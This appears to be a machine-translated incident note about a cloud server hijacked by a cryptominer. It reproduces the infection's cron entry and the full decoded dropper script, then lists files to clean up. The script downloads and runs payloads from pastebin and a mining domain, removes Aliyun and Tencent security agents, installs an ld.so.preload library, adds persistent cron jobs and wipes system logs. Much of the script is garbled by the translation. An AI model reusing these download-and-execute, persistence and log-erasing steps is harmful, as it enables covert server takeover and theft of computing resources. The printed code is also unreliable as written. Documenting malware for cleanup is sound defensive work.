ECS instance was dug by someone else, a file of ghosts, guess is after the Base64 code, because the planning tasks are:
*/23 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/tRxfvbYN)|sh
Open file like is Base64 encoded, online through BASE64 decoding later found is a script:
#!/bin/bashshell=/bin/shpath=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binfunction kills () {Pkill -F Sourplumpkill wntkyg && pkill ddg* && rm-rf/tmp/ddg* && rm-rf/tmp/wntkygrm-rf/tmp/qw3xt.2 /tmp/ddgs.3013/tmp/ddgs.3012/tmp/wntkyg/tmp/2t3ikrm-rf/boot/grub/deamon && RM-RF/BOOT/GRUB/DISK_GENIUSRM -RF/TMP/*INDEX_BAK*RM-RF/TMP/*HTTPD.CONF*RM-RF/TMP/*HTTPD.CONFRM-RF/TMP/A7B104C270PS auxf|grep-v Grep|grep "mine. Moneropool.com "|awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep" xmr.crypto-pool.fr:8080 "|awk ' {print $} ' |xargs Kill-9ps auxf|grep-v grep|grep "xmr.crypto-pool.fr:3333" |awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' Monero Hash.com "|awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep"/tmp/a7b104c270 "|awk ' {print $} ' |xargs Kill-9ps auxf| Grep-v grep|grep "xmr.crypto-pool.fr:6666" |awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' Xmr.crypto-pool.fr:7 777 "|awk ' {print $} ' |xargs Kill-9ps Auxf|grep-v grep|grep "xmr.crypto-pool.fr:443" |awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' stratum.f2pool.c om:8888 "|awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep" xmrpool.eu "| awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' Xmrig ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' Xmrigdaemon ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' Xmrigminer ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep '/var/tmp/java ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' DDGs ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' qw3xt ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' t00ls.ru ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep '/var/tmp/sustes ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' sustes ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' Xbash ' | awk ' {print $} ' |xargs kill-9ps auxf|grep-v grep|grep ' hashfish ' | awk ' {print $} ' |xargs Kill-9pkill-F biosetjenkinspkill-f anxqv.yampkill-f xmrigdaemonpkill-f xmrigminerpkill-f xmrigpkill-f loopbackpkill-f apacehapki Ll-f cryptonightpkill-f stratumpkill-f mixnerdxpkill-f performedlpkill-f jnkihgjnpkill-f irqba2anc1pkill-f irqba5xn C1pkill-f irqbnc1pkill-f ir29xc1pkill-f connspkill-f irqbalancepkill-f crypto-poolpkill-f minexmrpkill-f XJnRjpkill -F nxlaipkill-f bi5zjpkill-f askdljlqwpkill-f minerdpkill-f minergatepkill-f guard.shpkill-f ysaydhpkill-f BONNSPK Ill-f donnspkill-f kxjdpkill-f duck.shpkill-f bonn.shpkill-f conn.shpkill-f kworker34pkill-f kw.shpkill-f PRO.SHPK Ill-f polkitdpkill-f acpidpkill-f icb5opkill-f nopxipkill-f irqbalanc1pkill-f minerdpkill-f i586pkill-f Gddrpkill -F mstxmrpkill-f ddg.2011pkill-f wntkygpkill-f deamonpkill-f disk_geniuspkill-f sourplumpkill-f bashxpkill-f BASHGP Kill-f bashepkill-f bashfpkill-f bashhpkill-f xbashypkill-f libapachepkill-f qw3xt.2pkill-f/usr/bin/.sshdpkill-f Sustespkill-f XBASHRM-Rf/var/tmp/j*rm-rf/tmp/j*rm-rf/var/tmp/javarm-rf/tmp/javarm-rf/var/tmp/java2rm-rf/tmp/java2rm-rf/var/tmp/java *rm-rf/tmp/java*rm-rf/tmp/httpd.confrm-rf/tmp/connrm-rf/tmp/root.sh/tmp/pools.txt/tmp/libapache/tmp/config.jso N/tmp/bashf/tmp/bashg/tmp/libapacherm-rf/tmp/connsrm-f/tmp/irq.shrm-f/tmp/irqbalanc1rm-f/tmp/irqrm-rf/tmp/kwo rkerds/bin/kworkerds/bin/config.json/var/tmp/kworkerds/var/tmp/config.json/usr/local/lib/libjdk.sorm-rf/tmp/. Systemd-private-*chattr-i/usr/lib/libiacpkmn.so.3 && rm-rf/usr/lib/libiacpkmn.so.3chattr-i/etc/init.d/ Nfstruncate && RM-RF/ETC/INIT.D/NFSTRUNCATENETSTAT-ANP | grep 69.28.55.86:443 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep 185.71.65.238 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep 140.82.52.87 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep:3333 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} '| Xargs KILL-9NETSTAT-ANP | grep:4444 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep:5555 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep:6666 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep:7777 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep:3347 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep:14444 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep:14433 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs KILL-9NETSTAT-ANP | grep:13531 |awk ' {print $7} ' | Awk-f ' [/] ' {print $} ' | Xargs kill-9p=$ (PS auxf|grep-v grep|grep kworkerds|wc-l) if [${p}-eq 0];then ps auxf|grep-v grep | awk ' {if ($3>=90.0) print $} ' | Xargs kill-9fi}function System () {if [!-F "/bin/httpdns"]; then Curl-fssl--connect-timeout-Https://pa Stebin.com/raw/cnptq2tm-o/bin/httpdns &&chmod 755/bin/httpdns IF [!-F "/bin/httpdns"]; Then wget https://pastebin.com/raw/CnPtQ2tM-O/bin/httpdns && chmod 755/bin/httpdns fi if [!-F "/etc/crontab"]; Then ECHO-E "0 1 * * * root Httpdns" >/etc/crontab else sed-i ' $d '/etc/crontab &&A mp ECHO-E "0 1 * * * root httpdns" >>/etc/crontab fi fi}function Top () {mkdir-p/usr/local/lib/if [!-F "/usr/local/lib/libdns.so"]; Then Curl-fssl--connect-timeout https://master.minerxmr.ru/y/1539580368x-1566688371.jpg-o/usr/local/lib/lib dns.so && chmod 755/usr/local/lib/libdns.so if [!-F "/usr/local/lib/libdns.so"]; Then wget https://master.minerxmr.ru/y/1539580368x-1566688371.jpg-O/usr/local/lib/libdns.so && chmod 755/usr/local/lib/libdns.so fi fi echo/usr/local/lib/libdns.so >/etc/ld.so.preload touch-acmr/bin/ Sh/etc/ld.so.preload Touch-acmr/biN/sh/usr/local/lib/libdns.so}function python () {nohup python-c "import base64;exec (Base64.b64decode (' I2nvzgluzzogdx Rmltgkaw1wb3j0ihvybgxpygppbxbvcnqgymfzzty0cgpkpsanahr0chm6ly9wyxn0zwjpbi5jb20vcmf3l1zwddi3tgvijwp0cnk6ciagicbwywdlpwjhc2u 2nc5injrkzwnvzguodxjsbglilnvybg9wzw4ozckucmvhzcgpkqogicagzxhlyyhwywdlkqplegnlchq6ciagicbwyxnz ')) ">/dev/null 2>&1 & Touch/tmp/.pythong}function Echocron () {ECHO-E "*/10 * * * * * root (Curl-fssl https://pastebin. com/raw/1ntrkbc3| | Wget-q-o-https://pastebin.com/raw/1ntrkbc3) |sh\n## ">/etc/cron.d/root echo-e" */17 * * * * Root (Curl-fssl htt ps://pastebin.com/raw/1ntrkbc3| | Wget-q-o-https://pastebin.com/raw/1ntrkbc3) |sh\n## ">/etc/cron.d/apache echo-e" */23 * * * * (Curl-fssl http s://pastebin.com/raw/1ntrkbc3| | Wget-q-o-https://pastebin.com/raw/1ntrkbc3) |sh\n## ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs E CHO-E "*/31 * * * * * (Curl-fssl https://pastebin.com/raw/1NtRkBc3| | Wget-q -O-HTTPS://PASTEBIN.COM/RAW/1NTRKBC3) |sh\n## ">/var/spool/cron/crontabs/root mkdir-p/etc/cron.hourly curl-f SSL--connect-timeout https://pastebin.com/raw/1NtRkBc3-o/etc/cron.hourly/oanacroner && chmod 755/etc/ Cron.hourly/oanacroner if [!-F "/etc/cron.hourly/oanacroner"]; Then wget https://pastebin.com/raw/1NtRkBc3-O/etc/cron.hourly/oanacroner && chmod 755/etc/cron.hourly/oa Nacroner fi mkdir-p/etc/cron.daily curl-fssl--connect-timeout https://pastebin.com/raw/1NtRkBc3-o/etc/c Ron.daily/oanacroner && chmod 755/etc/cron.daily/oanacroner if [!-F "/etc/cron.daily/oanacroner"]; Then wget https://pastebin.com/raw/1NtRkBc3-O/etc/cron.daily/oanacroner && chmod 755/etc/cron.daily/oana Croner fi mkdir-p/etc/cron.monthly curl-fssl--connect-timeout https://pastebin.com/raw/1NtRkBc3-o/etc/c Ron.monthly/oanacroner && chmod 755/etc/cron.monthly/oanacroner if [!-F "/etC/cron.monthly/oanacroner "]; Then wget https://pastebin.com/raw/1NtRkBc3-O/etc/cron.monthly/oanacroner && chmod 755/etc/cron.monthly/ Oanacroner fi touch-acmr/bin/sh/var/spool/cron/root touch-acmr/bin/sh/var/spool/cron/crontabs/root Touch -acmr/bin/sh/etc/cron.d/apache Touch-acmr/bin/sh/etc/cron.d/root Touch-acmr/bin/sh/etc/cron.hourly/oanacron ER touch-acmr/bin/sh/etc/cron.daily/oanacroner touch-acmr/bin/sh/etc/cron.monthly/oanacroner}function tables () {iptables-i input-p tcp--dport 6379-j REJECT iptables-i input-s 127.0.0.1-p TCP--dport 6379-j ACCEPT I Ptables-save touch/tmp/.tables}function Uninstall () {if PS aux | grep-i ' [A]liyun '; then wget http://updat e.aegis.aliyun.com/download/uninstall.sh chmod +x uninstall.sh./uninstall.sh wget Http://update.aegi s.aliyun.com/download/quartz_uninstall.sh chmod +x quartz_uninstall.sh./quartz_uninstall.sh RM -F uninstall.sh quartz_uninstall.sh Pkill Aliyun-service rm-rf/etc/init.d/agentwatch/usr/sbin/aliyun-se Rvice rm-rf/usr/local/aegis*; elif PS aux | Grep-i ' [y]unjing '; Then/usr/local/qcloud/stargate/admin/uninstall.sh/usr/local/qcloud/yunjing/uninst.sh/usr/local/qcl oud/monitor/barad/admin/uninstall.sh fi touch/tmp/.uninstall}function Downloadrun () {ps=$ (Netstat-an | grep:5 6415 | WC-L) if [${ps}-eq 0];then if [!-F "/tmp/kworkerds"]; Then Curl-fssl--connect-timeout https://master.minerxmr.ru/y/1539875788x-1404792658.jpg-o/tmp/kworkerds && chmod +x/tmp/kworkerds If [!-F "/tmp/kworkerds"]; Then wget https://master.minerxmr.ru/y/1539875788x-1404792658.jpg-O/tmp/kworkerds && chmod +x/tm P/kworkerds fi nohup/tmp/kworkerds >/dev/null 2>&1 & Else Nohup /tmp/kworkerds >/dev/null 2>&Amp;1 & fi fi}function downloadrunxm () {mkdir-p/var/tmp chmod 1777/var/tmp pm=$ (Netstat-an | g rep:56415 | WC-L) if [${pm}-eq 0];then rm-rf/var/tmp/config.json* Curl-fssl--connect-timeout Er.minerxmr.ru/y/1539581805x1822611359.jpg-o/var/tmp/config.json && chmod +x/var/tmp/config.json if [! -F "/var/tmp/config.json"]; Then wget https://master.minerxmr.ru/y/1539581805x1822611359.jpg-O/var/tmp/config.json && chmod +x/v Ar/tmp/config.json fi arch=$ (uname-i) if ["$ARCH" = = "x86_64"]; Then rm-rf/var/tmp/kworkerds* Curl-fssl--connect-timeout https://master.minerxmr.ru/y/153959 2750x-1566688347.jpg-o/var/tmp/kworkerds && chmod +x/var/tmp/kworkerds if [!-F "/var/tmp/kworkerds " ]; Then wget https://master.minerxmr.ru/y/1539592750x-1566688347.jpg-O/bin/kworkerds && chmod +x/va R/tmp/kworkERDs fi nohup/var/tmp/kworkerds >/dev/null 2>&1 & elif ["$ARCH" = = "i386"]; Then rm-rf/var/tmp/kworkerds* Curl-fssl--connect-timeout https://master.minerxmr.ru/y/153959 2750x-1566688347.jpg-o/var/tmp/kworkerds && chmod +x/var/tmp/kworkerds if [!-F "/var/tmp/kworkerds " ]; Then wget https://master.minerxmr.ru/y/1539592750x-1566688347.jpg-O/bin/kworkerds && chmod +x/va R/tmp/kworkerds fi nohup/var/tmp/kworkerds >/dev/null 2>&1 & Else R m-rf/var/tmp/kworkerds* Curl-fssl--connect-timeout https://master.minerxmr.ru/y/1539592750x-1566688347. Jpg-o/var/tmp/kworkerds && chmod +x/var/tmp/kworkerds if [!-F "/var/tmp/kworkerds"]; Then wget https://master.minerxmr.ru/y/1539592750x-1566688347.jpg-O/bin/kworkerds && chmod +x/va R/tmp/kworkerds fi Nohup/var/tmp/kworkerds >/dev/null 2>&1 & fi fi}mkdir-p/tmpchmod 1777/tmpupdate=$ (c Url-fssl--connect-timeout https://pastebin.com/raw/SSCy7mY7) if [${update}x = "Update" x];then echocronelse I f [!-F "/tmp/.uninstall"]; Then uninstall FI if [!-F "/tmp/.tables"]; Then tables fi if [!-F "/tmp/.pythong"]; Then rm-rf/tmp/.pythonf python fi kills Downloadrun Echocron system top sleep P ort=$ (Netstat-an | grep:56415 | wc-l) if [${port}-eq 0];then downloadrunxm fi echo 0>/var/spool/m Ail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cronfi#
By checking the System planning task and DNS configuration file to resolve thoroughly, the related directory:
/etc/cron*/var/spool/cron/root```可能存在异常文件:```bash/usr/local/lib/libdns.so/etc/ld.so.preload/bin/dns/usr/sbin/netdns/etc/init.d/netdns( /etc/rc.d/init.d/netdns)
Also empty the/tmp directory.
The ECS server was dug by script, cpu100% load